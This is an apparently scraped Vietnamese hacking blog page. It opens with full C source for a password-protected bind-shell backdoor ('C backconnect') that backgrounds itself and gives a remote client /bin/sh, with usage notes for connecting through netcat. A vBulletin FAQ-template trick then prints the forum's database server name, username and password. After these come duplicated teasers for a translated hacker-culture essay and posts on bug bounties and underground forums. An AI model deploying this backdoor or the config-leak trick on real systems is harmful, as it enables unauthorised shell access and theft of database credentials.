#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define ENTERPASS "Nhap mat khau: \0"
#define WELCOME "Welcome to shell\r\nlet's do it:\r\n"
#define PASSWORD "ceh.vn"
int main(int argc, char **argv)
{
struct sockaddr_in c_addr;
struct sockaddr_in s_addr;
char buf[1024];
pid_t pid;
int i,sock_descriptor,temp_sock_descriptor,c_addrsize;
setuid(0);
setgid(0);
seteuid(0);
setegid(0);
if (argc!=2){
printf("=================================\r\n");
printf("|bin.c by pr0cess edit by kai\r\n");
printf("|Usage:\r\n");
printf("|./cehbin 2080\r\n");
printf("|nc -vv targetIP 2080\r\n");
printf("|Nhap mat khau\r\n");
printf("|Chuc may man ;)\r\n");
printf("=================================\r\n");
exit(1);
}
if (fork()){
exit(0);
}
sock_descriptor=socket(AF_INET,SOCK_STREAM,0);
if (socket(AF_INET,SOCK_STREAM,0)==-1){
printf("socket failed!");
exit(1);
}
memset(&s_addr,0,sizeof(s_addr));
//bzero(&s_addr,sizeof(s_addr));
s_addr.sin_family=AF_INET;
s_addr.sin_addr.s_addr=htonl(INADDR_ANY);
s_addr.sin_port=htons(atoi(argv[1]));
if (bind(sock_descriptor,(struct sockaddr *)&s_addr,sizeof(s_addr))==-1){
printf("bind failed!");
exit(1);
}
if (listen(sock_descriptor,20)==-1)//accept 20 connections
{
printf("listen failed!");
exit(1);
}
c_addrsize=sizeof(c_addr);
temp_sock_descriptor=accept(sock_descriptor,(struct sockaddr *)&c_addr,&c_addrsize);
//recv
while(temp_sock_descriptor){
pid=fork();
if (pid>0) {
close(temp_sock_descriptor);
continue;
}else if (pid==0){
write(temp_sock_descriptor, ENTERPASS, strlen(ENTERPASS));
memset(buf, '\0', 1024);
recv(temp_sock_descriptor, buf, 1024, 0);
if (strncmp(buf,PASSWORD,5) !=0){
close(temp_sock_descriptor);
exit(1);
}
write(temp_sock_descriptor, WELCOME, strlen(WELCOME));
dup2(temp_sock_descriptor,0);
dup2(temp_sock_descriptor,1);
dup2(temp_sock_descriptor,2);
execl("/bin/sh", "sh", (char *) 0);
close(temp_sock_descriptor);
exit(0);
}else{
exit(1);
}
}
close(sock_descriptor);
return 0;
}
Thứ Sáu, 7 tháng 12, 2012
[Code] C backconnect
vBulletin 3.x <= 4.2.0 FAQ (Echo config) trick
Go to acp, Faq Manager and then edit a FAQ, add the following code:{$vbulletin->config['MasterServer']['servername']}
{$vbulletin->config['MasterServer']['username']}
{$vbulletin->config['MasterServer']['password']}
{$vbulletin->config['Database']['dbname']}
Save it.Go to http://[path]/faq.php and check it # 1337day.com [2012-12-07]Thứ Tư, 5 tháng 12, 2012
Bài dịch: How To Become A Hacker - 2
Những điểm phong cách
Một lần nữa, để làm một hacker, bạn cần đi vào tâm thức của một hacker. Có một số điều có ích bạn có thể làm ngay cả khi bạn không động đến máy tính. Những điều này không dùng để thay thế cho hacking (chẳng có gì thay thế cho hacking cả) nhưng nhiều hackers làm những điều này và cảm thấy họ kết nối đến cốt lõi của hacking.
- Học cách viết ngôn ngữ mẹ đẻ của mình một cách nhuần nhuyễn. Dẫu thiên hạ thường nghĩ rằng dân lập trình không có khả năng viết lách, nhưng một con số đáng ngạc nhiên các hackers (bao gồm những người đã thành đạt nhất mà tôi biết) lại rất có khả năng viết lách.
READ MORE »
Một lần nữa, để làm một hacker, bạn cần đi vào tâm thức của một hacker. Có một số điều có ích bạn có thể làm ngay cả khi bạn không động đến máy tính. Những điều này không dùng để thay thế cho hacking (chẳng có gì thay thế cho hacking cả) nhưng nhiều hackers làm những điều này và cảm thấy họ kết nối đến cốt lõi của hacking.
- Học cách viết ngôn ngữ mẹ đẻ của mình một cách nhuần nhuyễn. Dẫu thiên hạ thường nghĩ rằng dân lập trình không có khả năng viết lách, nhưng một con số đáng ngạc nhiên các hackers (bao gồm những người đã thành đạt nhất mà tôi biết) lại rất có khả năng viết lách.
READ MORE »
Bài dịch: How To Become A Hacker - 1
How To Become A Hacker (Eric Steven Raymond - Copyright 2001)
Lời người dịch:
Đây là bản dịch của tài liệu "How To Become A Hacker" của Eric Steven Raymond. Bản gốc có ở http://catb.org/~esr/faqs/hacker-howto.html.
Tôi dịch tài liệu này với hy vọng phần nào cung cấp thông tin nhằm mục đích giải toả một số ngộ nhận về cái gọi là 'hacking'.
Cá nhân tôi cho rằng Eric Raymond có một cái nhìn cực đoan thể hiện qua những điều anh ta định nghĩa và phân tích trong tài liệu này. Có nhiều điểm anh ta cố tình (hay vô ý), càng về sau, càng đưa tính chất hacking hướng về việc đóng góp và phát triển cộng đồng mở nguồn và đây là một cái nhìn (theo tôi là) thiên vị. Tuy vậy, tài liệu này của Eric Raymond đã đưa ra những điểm giá trị về cái gọi là "thái độ" và khả năng tư duy một hacker. Những điểm bàn về "phong cách" và thói quen của hackers là những điểm lý thú.
Theo tôi, hacker và hacking không có biên giới rõ ràng về hệ điều hành, về software, về môi trường.... Hacking là việc thay đổi tính chất và khả năng làm việc của một sự thể và "sự thể" này không có giới hạn Microsoft, Linux, BSD, Solaris.... Hacking cũng không nhất thiết phải là những đóng góp cho cộng đồng mã nguồn mở. Bất cứ nơi đâu, hacking để giải quyết trở ngại, để cải thiện công việc, để nâng cao chất lượng.... đều là hacking. Rất mong bạn đọc với cái nhìn tỉnh táo.
READ MORE »
Lời người dịch:
Đây là bản dịch của tài liệu "How To Become A Hacker" của Eric Steven Raymond. Bản gốc có ở http://catb.org/~esr/faqs/hacker-howto.html.
Tôi dịch tài liệu này với hy vọng phần nào cung cấp thông tin nhằm mục đích giải toả một số ngộ nhận về cái gọi là 'hacking'.
Cá nhân tôi cho rằng Eric Raymond có một cái nhìn cực đoan thể hiện qua những điều anh ta định nghĩa và phân tích trong tài liệu này. Có nhiều điểm anh ta cố tình (hay vô ý), càng về sau, càng đưa tính chất hacking hướng về việc đóng góp và phát triển cộng đồng mở nguồn và đây là một cái nhìn (theo tôi là) thiên vị. Tuy vậy, tài liệu này của Eric Raymond đã đưa ra những điểm giá trị về cái gọi là "thái độ" và khả năng tư duy một hacker. Những điểm bàn về "phong cách" và thói quen của hackers là những điểm lý thú.
Theo tôi, hacker và hacking không có biên giới rõ ràng về hệ điều hành, về software, về môi trường.... Hacking là việc thay đổi tính chất và khả năng làm việc của một sự thể và "sự thể" này không có giới hạn Microsoft, Linux, BSD, Solaris.... Hacking cũng không nhất thiết phải là những đóng góp cho cộng đồng mã nguồn mở. Bất cứ nơi đâu, hacking để giải quyết trở ngại, để cải thiện công việc, để nâng cao chất lượng.... đều là hacking. Rất mong bạn đọc với cái nhìn tỉnh táo.
READ MORE »
Bug Bounty – Paypal có chơi đẹp?
Bug Bounty là chương trình tìm kiếm lỗ hổng bảo mật và thông báo cho đơn vị tổ chức và nhận giải thưởng. Các lỗ hổng tìm được sẽ được cung cấp duy nhất cho nhà tổ chức.
Nhiều trang web nổi tiếng như Facebook, Google, Paypal, Mozilla, Barracuda Networks chi hàng nghìn USD để trao giải thưởng cho các hacker tìm ra lỗi.
READ MORE »
Nhiều trang web nổi tiếng như Facebook, Google, Paypal, Mozilla, Barracuda Networks chi hàng nghìn USD để trao giải thưởng cho các hacker tìm ra lỗi.
READ MORE »
Forum hacker ngầm: Có nên tham gia hay không?
Trong giới hacker, security trước nay vẫn được phân chia thành mũ trắng và mũ đen. Một phía chuyên lợi dụng lỗi hổng đến tấn công, trục lợi mang mục đích xấu. Một bên là các chuyên gia tìm và khắc phục lỗ hổng.
Tuy vậy, ranh giới đen trắng thường rất mỏng manh. Trong thế giới mạng của các hacker cũng vậy. Nhiều diễn đàn được mở ra để trao đổi, học hỏi về kỹ thuật và bảo mật, nhưng cũng không ít diễn đàn đang tồn tại như một thế giới ngầm, hay còn gọi là Underground Hacker Forum, gọi tắt là UG.
READ MORE »
Tuy vậy, ranh giới đen trắng thường rất mỏng manh. Trong thế giới mạng của các hacker cũng vậy. Nhiều diễn đàn được mở ra để trao đổi, học hỏi về kỹ thuật và bảo mật, nhưng cũng không ít diễn đàn đang tồn tại như một thế giới ngầm, hay còn gọi là Underground Hacker Forum, gọi tắt là UG.
READ MORE »
Đăng ký:
Bài đăng (Atom)